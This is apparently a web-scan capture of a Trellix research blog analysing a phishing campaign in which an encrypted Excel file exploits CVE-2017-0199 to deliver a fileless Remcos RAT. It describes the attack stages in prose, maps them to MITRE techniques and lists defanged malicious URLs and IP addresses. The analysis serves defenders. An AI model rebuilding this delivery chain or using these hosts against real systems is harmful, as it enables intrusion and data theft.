www.trellix.com
Open in
urlscan Pro
2a02:26f0:7100::210:151
Public Scan
URL:
https://www.trellix.com/blogs/research/unmasking-the-hidden-threat-inside-a-sophisticated-excel-based-attack-delivering-...
Submission: On October 24 via api from IN — Scanned from DE
Submission: On October 24 via api from IN — Scanned from DE
Form analysis 6 forms found in the DOM
<form class="px-3 d-flex align-items-center gap-2 bi bi-search" id="searchForm">
<input class="custom-mobile-search-field flex-grow-1" placeholder="Search Trellix" aria-label="Search" id="msearch" data-result-path="/search/">
<button class="btn btn-primary me-2 px-2 py-0 bg-transparent text-primary border-0" type="submit">Search</button>
<div class="d-none d-lg-flex gap-2 align-items-center">
<a href="#" onclick="document.getElementById('msearch').value = ''" datalink-type="internal" datalink-id="newco:#">Clear</a>
<span>|</span>
<a id="searchTip" class="no-break" href="#" data-bs-toggle="modal" data-bs-target="#searchTipModal" datalink-type="internal" datalink-id="newco:#">Search Tips</a>
</div>
</form><form id="mktoForm_1075" novalidate="novalidate" class="mktoForm mktoHasWidth mktoLayoutLeft">
<style type="text/css"></style>
<div class="mktoFormRow" data-wrapper-for="Eval_ID__c"><input type="hidden" name="Eval_ID__c" class="mktoField mktoFieldDescriptor mktoFormCol" value=""></div>
<div class="mktoFormRow" data-wrapper-for="utmmedium"><input type="hidden" name="utmmedium" class="mktoField mktoFieldDescriptor mktoFormCol" value=""></div>
<div class="mktoFormRow" data-wrapper-for="utmaudience__c"><input type="hidden" name="utmaudience__c" class="mktoField mktoFieldDescriptor mktoFormCol" value=""></div>
<div class="mktoFormRow" data-wrapper-for="utmcontent__c"><input type="hidden" name="utmcontent__c" class="mktoField mktoFieldDescriptor mktoFormCol" value=""></div>
<div class="mktoFormRow" data-wrapper-for="utmsource__c"><input type="hidden" name="utmsource__c" class="mktoField mktoFieldDescriptor mktoFormCol" value=""></div>
<div class="mktoFormRow" data-wrapper-for="utmcampaign__c"><input type="hidden" name="utmcampaign__c" class="mktoField mktoFieldDescriptor mktoFormCol" value=""></div>
<div class="mktoFormRow" data-wrapper-for="Email">
<div class="mktoFieldDescriptor mktoFormCol">
<div class="mktoFieldWrap mktoRequiredField"><label id="LblEmail" for="Email" class="mktoLabel mktoHasWidth">
<div class="mktoAsterix">*</div>~business-email~
</label><input id="Email" name="Email" maxlength="255" aria-labelledby="LblEmail InstructEmail" type="email" class="mktoField mktoEmailField mktoHasWidth mktoRequired" aria-required="true"><span id="InstructEmail" tabindex="-1"
class="mktoInstruction"></span></div>
</div>
</div>
<div class="mktoFormRow" data-wrapper-for="Country">
<div class="mktoFieldDescriptor mktoFormCol">
<div class="mktoFieldWrap mktoRequiredField"><label id="LblCountry" for="Country" class="mktoLabel mktoHasWidth">
<div class="mktoAsterix">*</div>~country~
</label><select id="Country" name="Country" aria-labelledby="LblCountry InstructCountry" class="mktoField mktoHasWidth mktoRequired" aria-required="true">
<option value="">Select...</option>
<option value="Germany">Germany</option>
<option value="Afghanistan">Afghanistan</option>
<option value="Aland Islands">Aland Islands</option>
<option value="Albania">Albania</option>
<option value="Algeria">Algeria</option>
<option value="Andorra">Andorra</option>
<option value="Angola">Angola</option>
<option value="Anguilla">Anguilla</option>
<option value="Antarctica">Antarctica</option>
<option value="Antigua/Barbuda">Antigua/Barbuda</option>
<option value="Argentina">Argentina</option>
<option value="Armenia">Armenia</option>
<option value="Aruba">Aruba</option>
<option value="Australia">Australia</option>
<option value="Austria">Austria</option>
<option value="Azerbaijan">Azerbaijan</option>
<option value="Bahamas">Bahamas</option>
<option value="Bahrain">Bahrain</option>
<option value="Bangladesh">Bangladesh</option>
<option value="Barbados">Barbados</option>
<option value="Belarus">Belarus</option>
<option value="Belgium">Belgium</option>
<option value="Belize">Belize</option>
<option value="Benin">Benin</option>
<option value="Bermuda">Bermuda</option>
<option value="Bhutan">Bhutan</option>
<option value="Bolivia">Bolivia</option>
<option value="Bonaire">Bonaire</option>
<option value="Bosnia-Herz.">Bosnia-Herz.</option>
<option value="Botswana">Botswana</option>
<option value="Bouvet Island">Bouvet Island</option>
<option value="Brazil">Brazil</option>
<option value="Brit.Ind.Oc.Ter">Brit.Ind.Oc.Ter</option>
<option value="Brunei Darussalam">Brunei Darussalam</option>
<option value="Bulgaria">Bulgaria</option>
<option value="Burkina-Faso">Burkina-Faso</option>
<option value="Burundi">Burundi</option>
<option value="Cambodia">Cambodia</option>
<option value="Cameroon">Cameroon</option>
<option value="Canada">Canada</option>
<option value="Cape Verde">Cape Verde</option>
<option value="Cayman Islands">Cayman Islands</option>
<option value="Central African Republic">Central African Republic</option>
<option value="Chad">Chad</option>
<option value="Chile">Chile</option>
<option value="China">China</option>
<option value="Christmas Island">Christmas Island</option>
<option value="Coconut Islands">Coconut Islands</option>
<option value="Colombia">Colombia</option>
<option value="Comoros">Comoros</option>
<option value="Congo">Congo</option>
<option value="Cook Islands">Cook Islands</option>
<option value="Costa Rica">Costa Rica</option>
<option value="Ivory Coast">Ivory Coast</option>
<option value="Croatia">Croatia</option>
<option value="Cuba">Cuba</option>
<option value="Curacao">Curacao</option>
<option value="Cyprus">Cyprus</option>
<option value="Czech Republic">Czech Republic</option>
<option value="Denmark">Denmark</option>
<option value="Djibouti">Djibouti</option>
<option value="Dominica">Dominica</option>
<option value="Dominican Republic">Dominican Republic</option>
<option value="East Timor">East Timor</option>
<option value="Ecuador">Ecuador</option>
<option value="Egypt">Egypt</option>
<option value="El Salvador">El Salvador</option>
<option value="Equatorial Guinea">Equatorial Guinea</option>
<option value="Eritrea">Eritrea</option>
<option value="Estonia">Estonia</option>
<option value="Ethiopia">Ethiopia</option>
<option value="Falkland Islnds">Falkland Islnds</option>
<option value="Faroe Islands">Faroe Islands</option>
<option value="Fiji">Fiji</option>
<option value="Finland">Finland</option>
<option value="France">France</option>
<option value="French Guiana">French Guiana</option>
<option value="French Polynesia">French Polynesia</option>
<option value="French Southern Territories">French Southern Territories</option>
<option value="Gabon">Gabon</option>
<option value="Gambia">Gambia</option>
<option value="Georgia">Georgia</option>
<option value="Ghana">Ghana</option>
<option value="Gibraltar">Gibraltar</option>
<option value="Greece">Greece</option>
<option value="Greenland">Greenland</option>
<option value="Grenada">Grenada</option>
<option value="Guadeloupe">Guadeloupe</option>
<option value="Guam">Guam</option>
<option value="Guatemala">Guatemala</option>
<option value="Guernsey">Guernsey</option>
<option value="Guinea">Guinea</option>
<option value="Guinea-Bissau">Guinea-Bissau</option>
<option value="Guyana">Guyana</option>
<option value="Haiti">Haiti</option>
<option value="Heard and Mc Donald Islands">Heard and Mc Donald Islands</option>
<option value="Vatican City">Vatican City</option>
<option value="Honduras">Honduras</option>
<option value="Hong Kong">Hong Kong</option>
<option value="Hungary">Hungary</option>
<option value="Iceland">Iceland</option>
<option value="Slovenia">Slovenia</option>
<option value="India">India</option>
<option value="Indonesia">Indonesia</option>
<option value="Iraq">Iraq</option>
<option value="Ireland">Ireland</option>
<option value="Isle of Man">Isle of Man</option>
<option value="Israel">Israel</option>
<option value="Italy">Italy</option>
<option value="Jamaica">Jamaica</option>
<option value="Japan">Japan</option>
<option value="Jersey">Jersey</option>
<option value="Jordan">Jordan</option>
<option value="Kazakhstan">Kazakhstan</option>
<option value="Kenya">Kenya</option>
<option value="Kiribati">Kiribati</option>
<option value="Kosovo">Kosovo</option>
<option value="Kuwait">Kuwait</option>
<option value="Kyrgyzstan">Kyrgyzstan</option>
<option value="Laos">Laos</option>
<option value="Latvia">Latvia</option>
<option value="Lebanon">Lebanon</option>
<option value="Lesotho">Lesotho</option>
<option value="Liberia">Liberia</option>
<option value="Libya">Libya</option>
<option value="Liechtenstein">Liechtenstein</option>
<option value="Lithuania">Lithuania</option>
<option value="Luxembourg">Luxembourg</option>
<option value="Macau">Macau</option>
<option value="Madagascar">Madagascar</option>
<option value="Malawi">Malawi</option>
<option value="Malaysia">Malaysia</option>
<option value="Maldives">Maldives</option>
<option value="Mali">Mali</option>
<option value="Malta">Malta</option>
<option value="Marshall Islnds">Marshall Islnds</option>
<option value="Martinique">Martinique</option>
<option value="Mauritania">Mauritania</option>
<option value="Mauritius">Mauritius</option>
<option value="Mayotte">Mayotte</option>
<option value="Mexico">Mexico</option>
<option value="Micronesia">Micronesia</option>
<option value="Moldova">Moldova</option>
<option value="Monaco">Monaco</option>
<option value="Mongolia">Mongolia</option>
<option value="Montenegro">Montenegro</option>
<option value="Montserrat">Montserrat</option>
<option value="Morocco">Morocco</option>
<option value="Mozambique">Mozambique</option>
<option value="Myanmar">Myanmar</option>
<option value="Namibia">Namibia</option>
<option value="Nauru">Nauru</option>
<option value="Nepal">Nepal</option>
<option value="Netherlands">Netherlands</option>
<option value="Netherlands Antilles">Netherlands Antilles</option>
<option value="New Caledonia">New Caledonia</option>
<option value="New Zealand">New Zealand</option>
<option value="Nicaragua">Nicaragua</option>
<option value="Niger">Niger</option>
<option value="Nigeria">Nigeria</option>
<option value="Niue Islands">Niue Islands</option>
<option value="Norfolk Island">Norfolk Island</option>
<option value="N.Mariana Islnd">N.Mariana Islnd</option>
<option value="Macedonia">Macedonia</option>
<option value="North Macedonia">North Macedonia</option>
<option value="Norway">Norway</option>
<option value="Oman">Oman</option>
<option value="Pakistan">Pakistan</option>
<option value="Palau">Palau</option>
<option value="Palestine State">Palestine State</option>
<option value="Panama">Panama</option>
<option value="Papua New Guinea">Papua New Guinea</option>
<option value="Paraguay">Paraguay</option>
<option value="Peru">Peru</option>
<option value="Philippines">Philippines</option>
<option value="Pitcairn Islnds">Pitcairn Islnds</option>
<option value="Poland">Poland</option>
<option value="Portugal">Portugal</option>
<option value="Puerto Rico">Puerto Rico</option>
<option value="Qatar">Qatar</option>
<option value="Reunion">Reunion</option>
<option value="Romania">Romania</option>
<option value="Russian Federation">Russian Federation</option>
<option value="Rwanda">Rwanda</option>
<option value="St. Barthelemy">St. Barthelemy</option>
<option value="St. Helena">St. Helena</option>
<option value="Saint Kitts and Nevis">Saint Kitts and Nevis</option>
<option value="St. Lucia">St. Lucia</option>
<option value="St. Martin">St. Martin</option>
<option value="St. Pierre and Miquelon">St. Pierre and Miquelon</option>
<option value="St. Vincent">St. Vincent</option>
<option value="Samoa American">Samoa American</option>
<option value="San Marino">San Marino</option>
<option value="Sao Tome and Principe">Sao Tome and Principe</option>
<option value="Saudi Arabia">Saudi Arabia</option>
<option value="Senegal">Senegal</option>
<option value="Serbia">Serbia</option>
<option value="Seychelles">Seychelles</option>
<option value="Sierra Leone">Sierra Leone</option>
<option value="Singapore">Singapore</option>
<option value="Sint Maarten">Sint Maarten</option>
<option value="Slovak Republic">Slovak Republic</option>
<option value="Solomon Islands">Solomon Islands</option>
<option value="Somalia">Somalia</option>
<option value="South Africa">South Africa</option>
<option value="S. Sandwich Islands">S. Sandwich Islands</option>
<option value="South Korea">South Korea</option>
<option value="South Sudan">South Sudan</option>
<option value="Spain">Spain</option>
<option value="Sri Lanka">Sri Lanka</option>
<option value="Sudan">Sudan</option>
<option value="Suriname">Suriname</option>
<option value="Svalbard">Svalbard</option>
<option value="Swaziland">Swaziland</option>
<option value="Sweden">Sweden</option>
<option value="Switzerland">Switzerland</option>
<option value="Syria">Syria</option>
<option value="Taiwan">Taiwan</option>
<option value="Tajikistan">Tajikistan</option>
<option value="Tanzania">Tanzania</option>
<option value="Thailand">Thailand</option>
<option value="Timor-Leste">Timor-Leste</option>
<option value="Togo">Togo</option>
<option value="Tokelau Islands">Tokelau Islands</option>
<option value="Tonga">Tonga</option>
<option value="Trinidad and Tobago">Trinidad and Tobago</option>
<option value="Tunisia">Tunisia</option>
<option value="Turkey">Turkey</option>
<option value="Turkmenistan">Turkmenistan</option>
<option value="Turks and Caicos Islands">Turks and Caicos Islands</option>
<option value="Tuvalu">Tuvalu</option>
<option value="Uganda">Uganda</option>
<option value="Ukraine">Ukraine</option>
<option value="United Arab Emirates">United Arab Emirates</option>
<option value="United Kingdom">United Kingdom</option>
<option value="USA">United States</option>
<option value="United States Minor Outlying">United States Minor Outlying</option>
<option value="Uruguay">Uruguay</option>
<option value="Uzbekistan">Uzbekistan</option>
<option value="Vanuatu">Vanuatu</option>
<option value="Venezuela">Venezuela</option>
<option value="Vietnam">Vietnam</option>
<option value="Virgin Islands British">Virgin Islands British</option>
<option value="Virgin Islands U.S.">Virgin Islands U.S.</option>
<option value="Wallis and Futuna Islands">Wallis and Futuna Islands</option>
<option value="Western Sahara">Western Sahara</option>
<option value="Western Samoa">Western Samoa</option>
<option value="Yemen">Yemen</option>
<option value="Zambia">Zambia</option>
<option value="Zimbabwe">Zimbabwe</option>
</select><span id="InstructCountry" tabindex="-1" class="mktoInstruction"></span></div>
</div>
</div>
<div class="mktoFormRow">
<div class="mktoPlaceholder mktoPlaceholderState"></div>
</div>
<div class="mktoFormRow">
<div class="mktoFormCol">
<div class="mktoFieldWrap">
<div class="mktoHtmlText mktoHasWidth">~general-agreement-msg~</div>
</div>
</div>
</div>
<div class="mktoButtonRow"><span class="mktoButtonWrap mktoNative"><button type="submit" class="mktoButton">~submit~</button></span></div><input type="hidden" name="formid" class="mktoField mktoFieldDescriptor" value="1075"><input type="hidden"
name="munchkinId" class="mktoField mktoFieldDescriptor" value="627-OOG-590"><input type="hidden" name="LastFormURL" class="mktoField mktoFieldDescriptor"
value="https://www.trellix.com/blogs/research/unmasking-the-hidden-threat-inside-a-sophisticated-excel-based-attack-delivering-fileless-remcos-rat/">
</form><form id="otpForm" class="needs-validation" novalidate="">
<div class="form-floating mb-5">
<input type="number" class="form-control" id="otp" placeholder="Enter the OTP" name="otp" required="">
<label for="otp">One-Time-Password</label>
<div class="invalid-feedback">Please enter OTP.</div>
</div>
<div class="Tabmodal" style="display: none; width: 5%;margin-left: 5%; margin-bottom:1%">
<img id="loader" src="/admin/images/ajax-loading.gif" alt="">
</div>
<div class="d-flex gap-3">
<div class="mb-3">
<button id="otpSubmit" type="submit" class="btn btn-primary">Submit</button>
</div>
<p class="mb-0">
<a id="reotp" href="#" class="btn btn-outline-primary" datalink-type="internal" datalink-id="newco:#">Resend OTP</a>
</p>
</div>
<h6 id="errmessage" style="display:none; margin-bottom:1.5rem;"></h6>
</form><form id="blogsSearchForm">
<div class="input-group position-relative blogssearchbox h-100">
<input class="form-control p-2 ps-6 m-0" placeholder="Search Blogs" type="search" aria-label="Search" id="blogssearch">
<div class="bi bi-search position-absolute start-0 ms-3 mt-2 pt-1 lh-sm"></div>
</div>
</form><form novalidate="">
<div class="mb-0 col-12 d-flex justify-content-center mx-auto flex-column flex-md-row">
<div class="form-floating mx-0 me-md-3">
<input type="email" onchange="document.querySelector('#subscribeEmailModal').value = document.querySelector('#subscribeEmailBlade').value;" class="form-control custom-input" id="subscribeEmailBlade" placeholder="Email" required="">
<div class="invalid-feedback text-start"> Please enter a valid email address. </div>
<div class="biz-email-msg invalid-feedback">Please enter a business email address</div>
</div>
<div class="mt-3 mt-md-0">
<button class="btn btn-primary custom-submit" onclick="event.preventDefault()" data-bs-toggle="modal" data-bs-target="#subModal">Submit</button>
</div>
</div>
</form><form novalidate="novalidate" class="mktoForm mktoHasWidth mktoLayoutLeft" style="font-family: inherit; font-size: 13px; color: rgb(51, 51, 51); visibility: hidden; position: absolute; top: -500px; left: -1000px; width: 1600px;"></form>Text Content
--------------------------------------------------------------------------------
* Breached?
* Research
* CISO
* Contact
* Login
Trellix Login Trellix Hive Developer Portal Marketplace
* Search
Search
Clear | Search Tips
QUICK LINKS
Why Trellix? | Products | Advanced Research Center | Newsroom | Blogs
* Change Language
Australia (English) Brasil (Português) Canada (English) Canada (Français)
Deutschland (Deutsch) España (Español) France (Français) Hong Kong (English)
India (English) Italia (Italiano) 日本 (日本語) 대한민국 (한국어) México (Español)
Singapore (English) United Kingdom (English) United States (English)
* Why Trellix?
* Platform
* Services
* Partners
* Resources
* About
Why Trellix?
--------------------------------------------------------------------------------
Why Trellix? Why Trellix is the best choice in cybersecurity Trellix vs.
CrowdStrike Transparency, choice, and responsibility Trellix Platform
Advantage Discover the benefits of the Trellix platform
Threat Intelligence
--------------------------------------------------------------------------------
Advanced Research Center Explore the latest in cybersecurity research Trellix
Insights Get the latest insights from our experts Threat Reports Stay ahead
of the latest threats Latest Research Blogs Read the latest research from our
experts
No Alert Left Behind Challenge
Take the Trellix Challenge and find out how to investigate 100% of your
alerts using GenAI
Platform Capabilities
--------------------------------------------------------------------------------
About Our Platform Learn about our AI-powered security platform Trellix Wise
Investigate 100% of alerts with GenAI Engine AI-powered context; respond in
minutes
Product Categories
--------------------------------------------------------------------------------
Endpoint Security Data Security Network Security Threat Intelligence Email
Security Cloud Security SIEM View All Products
Solutions
--------------------------------------------------------------------------------
Ransomware Detection and Response Zero Trust Strategy AI and Security
Operations CISO Government Election Security
Professional Services
--------------------------------------------------------------------------------
Trellix Thrive Solution Services Cyber Consulting Services
Education And Training
--------------------------------------------------------------------------------
Education Services Training Courses
Trellix Thrive
Make the most of your investment in Trellix’s industry-leading cybersecurity
technologies
Partners
--------------------------------------------------------------------------------
Partners Overview Security Innovation Alliance OEM & Embedded Alliances
Amazon Web Services (AWS) Google Cloud Telefónica Tech
Partner Portal
--------------------------------------------------------------------------------
Trellix Hive Login Become a Partner
Managed Detection And Response
--------------------------------------------------------------------------------
Managed Detection and Response Services What is Managed Detection and
Response?
Resource Center
--------------------------------------------------------------------------------
Resource Library Customer Stories Security Awareness Topics
Learn
--------------------------------------------------------------------------------
Webinars Weekly Tech Talk Series Product Tours
Weekly Tech Talk Series
Join Trellix technical experts in a weekly 30-minute tech talk webinar series
Company
--------------------------------------------------------------------------------
About Trellix Leadership Industry Recognition Customer Stories Careers
Media
--------------------------------------------------------------------------------
Press Releases Latest News Blogs View Newsroom
Connect
--------------------------------------------------------------------------------
Events Contact Us
Get Started
Menu
Why Trellix?
Platform
Services
Partners
Resources
About
Get Started
Breached?
Contact Us
Main menu
WHY TRELLIX?
Why Trellix? Trellix vs. CrowdStrike Trellix Platform Advantage
THREAT INTELLIGENCE
Advanced Research Center Trellix Insights Threat Reports Latest Research Blogs
Main menu
PLATFORM CAPABILITIES
About Our Platform Trellix Wise Engine
PRODUCT CATEGORIES
Endpoint Security Data Security Network Security Threat Intelligence Email
Security Cloud Security SIEM View All Products
SOLUTIONS
Ransomware Detection and Response Zero Trust Strategy AI and Security Operations
CISO Government Election Security
Main menu
PROFESSIONAL SERVICES
Trellix Thrive Solution Services Cyber Consulting Services
EDUCATION AND TRAINING
Education Services Training Courses
Main menu
PARTNERS
Partners Overview Security Innovation Alliance OEM & Embedded Alliances Amazon
Web Services (AWS) Google Cloud Telefónica Tech
PARTNER PORTAL
Trellix Hive Login Become a Partner
MANAGED DETECTION AND RESPONSE
Managed Detection and Response Services What is Managed Detection and Response?
Main menu
RESOURCE CENTER
Resource Library Customer Stories Security Awareness Topics
LEARN
Webinars Weekly Tech Talk Series Product Tours
LOGIN
Trellix Login Trellix Hive Developer Portal Marketplace
Main menu
COMPANY
About Us Leadership Industry Recognition Customer Stories Careers
MEDIA
Press Releases Latest News Blogs View Newsroom
CONNECT
Events Contact Us
Take a Product Tour Request a Demo Cybersecurity Assessment Contact Us
BLOGS
THE LATEST CYBERSECURITY TRENDS, BEST PRACTICES, SECURITY VULNERABILITIES, AND
MORE
Subscribe
Stay updated
*
~business-email~
*
~country~Select...GermanyAfghanistanAland
IslandsAlbaniaAlgeriaAndorraAngolaAnguillaAntarcticaAntigua/BarbudaArgentinaArmeniaArubaAustraliaAustriaAzerbaijanBahamasBahrainBangladeshBarbadosBelarusBelgiumBelizeBeninBermudaBhutanBoliviaBonaireBosnia-Herz.BotswanaBouvet
IslandBrazilBrit.Ind.Oc.TerBrunei
DarussalamBulgariaBurkina-FasoBurundiCambodiaCameroonCanadaCape VerdeCayman
IslandsCentral African RepublicChadChileChinaChristmas IslandCoconut
IslandsColombiaComorosCongoCook IslandsCosta RicaIvory
CoastCroatiaCubaCuracaoCyprusCzech RepublicDenmarkDjiboutiDominicaDominican
RepublicEast TimorEcuadorEgyptEl SalvadorEquatorial
GuineaEritreaEstoniaEthiopiaFalkland IslndsFaroe IslandsFijiFinlandFranceFrench
GuianaFrench PolynesiaFrench Southern
TerritoriesGabonGambiaGeorgiaGhanaGibraltarGreeceGreenlandGrenadaGuadeloupeGuamGuatemalaGuernseyGuineaGuinea-BissauGuyanaHaitiHeard
and Mc Donald IslandsVatican CityHondurasHong
KongHungaryIcelandSloveniaIndiaIndonesiaIraqIrelandIsle of
ManIsraelItalyJamaicaJapanJerseyJordanKazakhstanKenyaKiribatiKosovoKuwaitKyrgyzstanLaosLatviaLebanonLesothoLiberiaLibyaLiechtensteinLithuaniaLuxembourgMacauMadagascarMalawiMalaysiaMaldivesMaliMaltaMarshall
IslndsMartiniqueMauritaniaMauritiusMayotteMexicoMicronesiaMoldovaMonacoMongoliaMontenegroMontserratMoroccoMozambiqueMyanmarNamibiaNauruNepalNetherlandsNetherlands
AntillesNew CaledoniaNew ZealandNicaraguaNigerNigeriaNiue IslandsNorfolk
IslandN.Mariana IslndMacedoniaNorth MacedoniaNorwayOmanPakistanPalauPalestine
StatePanamaPapua New GuineaParaguayPeruPhilippinesPitcairn
IslndsPolandPortugalPuerto RicoQatarReunionRomaniaRussian FederationRwandaSt.
BarthelemySt. HelenaSaint Kitts and NevisSt. LuciaSt. MartinSt. Pierre and
MiquelonSt. VincentSamoa AmericanSan MarinoSao Tome and PrincipeSaudi
ArabiaSenegalSerbiaSeychellesSierra LeoneSingaporeSint MaartenSlovak
RepublicSolomon IslandsSomaliaSouth AfricaS. Sandwich IslandsSouth KoreaSouth
SudanSpainSri
LankaSudanSurinameSvalbardSwazilandSwedenSwitzerlandSyriaTaiwanTajikistanTanzaniaThailandTimor-LesteTogoTokelau
IslandsTongaTrinidad and TobagoTunisiaTurkeyTurkmenistanTurks and Caicos
IslandsTuvaluUgandaUkraineUnited Arab EmiratesUnited KingdomUnited StatesUnited
States Minor OutlyingUruguayUzbekistanVanuatuVenezuelaVietnamVirgin Islands
BritishVirgin Islands U.S.Wallis and Futuna IslandsWestern SaharaWestern
SamoaYemenZambiaZimbabwe
~general-agreement-msg~
~submit~
OTP Validation
Please check your email for a one-time-password. The password expires in 10
minutes.
One-Time-Password
Please enter OTP.
Submit
Resend OTP
<<
Blogs:
XDR
Research
Perspectives
ARIA RESORT & CASINO | LAS VEGAS
SEPTEMBER 27-29, 2022
Register Now Learn More
UNMASKING THE HIDDEN THREAT: INSIDE A SOPHISTICATED EXCEL-BASED ATTACK
DELIVERING FILELESS REMCOS RAT
By Trishaan Kalra · September 11, 2024
INTRODUCTION
In the rapidly evolving landscape of cybersecurity, attackers are continuously
refining their methods to bypass detection and deliver malicious payloads. This
blog dissects a recent advanced malware campaign that leverages a seemingly
benign Excel file delivered via phishing that exploits CVE-2017-0199, a critical
vulnerability in Microsoft Office and WordPad that allows attackers to execute
arbitrary code when a user opens a specially crafted document. Specifically,
this vulnerability occurs in the handling of Object Linking and Embedding (OLE)
objects, enabling an attacker to embed malicious code within a file that appears
benign. This sophisticated campaign utilizes encrypted Microsoft Office
documents, Object Linking and Embedding (OLE) objects, and multiple layers of
obfuscated scripts to execute a fileless variant of the Remcos Remote Access
Trojan (RAT) on the victim's system. We will explore each stage of the attack
chain and provide actionable insights for cybersecurity professionals.
MALWARE CAMPAIGN OVERVIEW
The malware campaign being analyzed demonstrates the increasing complexity of
modern cyber threats. The attack begins with a phishing email containing an
encrypted Excel file that exploits CVE-2017-0199. Upon opening the file, OLE
objects are used to trigger the download and execution of a malicious HTA
application. This HTA application subsequently launches a chain of PowerShell
commands that culminate in the injection of a fileless Remcos RAT into a
legitimate Windows process. This RAT establishes persistence on the system,
allowing the attacker to maintain control and exfiltrate data.
Since the discovery of CVE-2017-0199, the cybersecurity landscape has witnessed
a range of similar malware campaigns delivering threats such as LATENTBOT,
FINSPY, and WingBird/FinFisher. More recently, in 2024, new campaigns following
a comparable kill-chain have emerged, deploying malware like RevengeRAT,
SnakeKeylogger, GuLoader, AgentTesla, and FormBook across the globe,
particularly targeting the Government, Manufacturing, Technology/IT, and Banking
sectors. This delivery mechanism is predominantly active in Belgium, Japan, the
United States, South Korea, Canada, Germany, and Australia (Fig. 1). These
ongoing campaigns underscore the persistent and evolving danger posed by this
vulnerability, highlighting its critical role in enabling sophisticated
cyberattacks.
Figure 1: Geographical Heatmap visualizing the usage of similar attack chain
globally
DETAILED ANALYSIS
DELIVERY MECHANISM
The malware campaign begins with a threat actor emailing a Microsoft Office
document to a targeted user, embedding an OLE2 link object within it. To gain
initial access, the attacker employs a deceptive, encrypted Excel document (Fig.
2a) that exploits CVE-2017-0199. The file appears innocuous, featuring a
pixelated screenshot from another to give the impression that it is protected,
enticing the victim to interact with it (Fig. 2b). This subtle manipulation
successfully convinces the victim to engage with the document, unknowingly
triggering the execution of the embedded OLE objects.
* MITRE ATT&CK Techniques
* T1566.001 (Phishing: Spearphishing Attachment)
* T1204.002 (User Execution: Malicious File)
Figure 2a: oletools confirming that the excel file is encrypted
Figure 2b: Excel document containing pixelated screenshot
WEAPONIZATION
OLE Embedded Objects are a known method for delivering malicious payloads as
they can be hidden within seemingly harmless documents. The file being analyzed
here, which exploits CVE-2017-0199, is an OLE- embedded document that contains a
malicious URL (hxxps[:]//slug[.]vercel[.]app/wyiqkf) embedded within an OLE
object (Fig. 3). Once the embedded OLE object is executed, it established an
outbound connection to a malicious URL
(hxxp[:]//45.90.89.50/xampp/ien/INET.hta), initiating the download and execution
of a weaponized HTA file.
* MITRE ATT&CK Techniques
* T1203 (Exploitation for Client Execution)
* T1221 (Template Injection)
Figure 3: Embedded OLE object containing malicious URL
EXPLOITATION
Upon execution, the URL-encoded HTA application (Fig. 4) runs PowerShell by
passing multiple base64-encoded parameters (Fig. 5), which decodes into a
command to download and execute a VBScript from a malicious URL
(hxxp[:]//45[.]90[.]89[.]50/100/instantflowercaseneedbeautygirlsherealways.gIF)
passed in it (Fig. 6). This execution process is facilitated by the Excel file's
exploitation of CVE-2017-0199, enabling the delivery of the malicious HTA
application.
Figure 4: URL-encoded HTA application
Figure 5: base64-encoded parameters passed to execute PowerShell
Figure 6: Decoded parameters passed to PowerShell for execution
The executed program initially appears to be a harmless utility VBScript
intended for configuring secure sessions in a networked environment (Fig. 7).
However, a deeper inspection uncovers a block of obfuscated data within the
script (Fig. 8). Upon execution of the VBScript, the discovered obfuscated data
is processed by PowerShell (Fig. 9), revealing its true purpose. This clever
obfuscation and delayed execution strategy is designed to evade detection,
allowing the malicious payload to be deployed stealthily in the target
environment.
Figure 7: VBScript appearing as benign utility script
Figure 8: Block of obfuscated data present in executed VBScript
Figure 9: Obfuscated data getting executed by PowerShell10
Analyzing the memory space allocated to the PowerShell process executing the
obfuscated data reveals that it initiates another PowerShell process to further
the attack (Fig. 10). This behavior is confirmed by inspecting the child
processes spawned by the initial process (Fig. 11). This chaining of PowerShell
commands and the creation of new processes exemplify the sophisticated and
layered approach used by the malware to evade detection while maintaining
persistence and advancing its malicious objectives.
Figure 10: Obfuscated data getting executed by PowerShell
Figure 11: PowerShell process spawning another PowerShell process to escalate
the attack
The newly spawned PowerShell process executes with multiple parameters (Fig.
12), initially downloading a JPEG file (Fig. 13) from a malicious URL
(hxxp[:]//servidorwindows[.]ddns[.]com[.]br/Files/vbs.jpeg) controlled by the
attacker.
* MITRE ATT&CK Techniques
* T1059.001(Command and Scripting Interpreter: PowerShell)
* T1059.001 (Command and Scripting Interpreter: Visual Basic)
* T1140 (Deobfuscate/Decode Files or Information)
Figure 12: Parameters passed to newly spawned PowerShell process
Figure 13: Downloaded JPEG file
INSTALLATION
The downloaded JPEG file has been manipulated to embed a base64-encoded
‘dnlib.dll’ (Fig. 14), an open-source .NET library used for reading, writing,
and creating .NET assemblies and modules. The encoded ‘dnlib.dll’ is then
decoded and loaded directly into memory via ‘System.Reflection.Assembly’, a .NET
class that allows dynamic loading, inspection, and execution of assemblies at
runtime.
* MITRE ATT&CK Techniques
* T1127 (Trusted Developer Utilities)
* T1105 (Ingress Tool Transfer)
* T1027.003 (Obfuscated Files or Information: Steganography)
* T1072 (Software Deployment Tools)
Figure 14: Base64-encoded ‘dnlib.dll’ present in downloaded JPEG file
EXECUTION
PowerShell subsequently downloads a text file containing base64-encoded data
(Fig. 15) from a malicious URL and inputs it into the previously loaded
‘dnlib.dll’ to generate a .NET assembly in memory. This assembly is a variant of
Remcos RAT, which is then injected into the legitimate Windows process ‘RegAsm’
(Fig. 16) for execution.
Figure 15: Base64-encoded text file being used by ‘dnlib.dll’ to create a .NET
assembly of Remcos RAT
Figure 16: Strings related to Remcos found in RegAsm process memory
Upon inspecting the filesystem changes made by ‘RegAsm’, Remcos-associated
behavior and indicators are observed. These indicators confirm the presence of
Remcos RAT on the test system (Figs. 17 & 18).
* MITRE ATT&CK Techniques
* T1055.001 (Process Injection: Dynamic-link Library Injection)
* T1027 (Obfuscated Files or Information)
Figure 17: IOC associated to Remcos RAT
Figure 18: Remcos RAT keylogger file
PERSISTENCE AND DEFENSE EVASION
The Remcos RAT establishes persistence by injecting itself into legitimate
processes, effectively evading traditional security defenses and ensuring
continuous attacker access.
* MITRE ATT&CK Techniques
* T1543.003 (Create or Modify System Process: Windows Service)
* T1071.001 (Application Layer Protocol: Web Protocols)
CONCLUSION
This campaign illustrates the evolving sophistication of modern malware attacks.
By leveraging vulnerabilities like CVE-2017-0199 alongside advanced fileless
techniques, OLE objects, and memory-only .NET assemblies, the attackers have
crafted a highly evasive and persistent threat. By understanding these
techniques and the corresponding attack chain, cybersecurity professionals can
develop more effective defense mechanisms against such advanced threats.
INDICATORS OF COMPROMISE
IP ADDRESSES
45[.]90[.]89[.]50
76[.]76[.]21[.]22
76[.]76[.]21[.]93
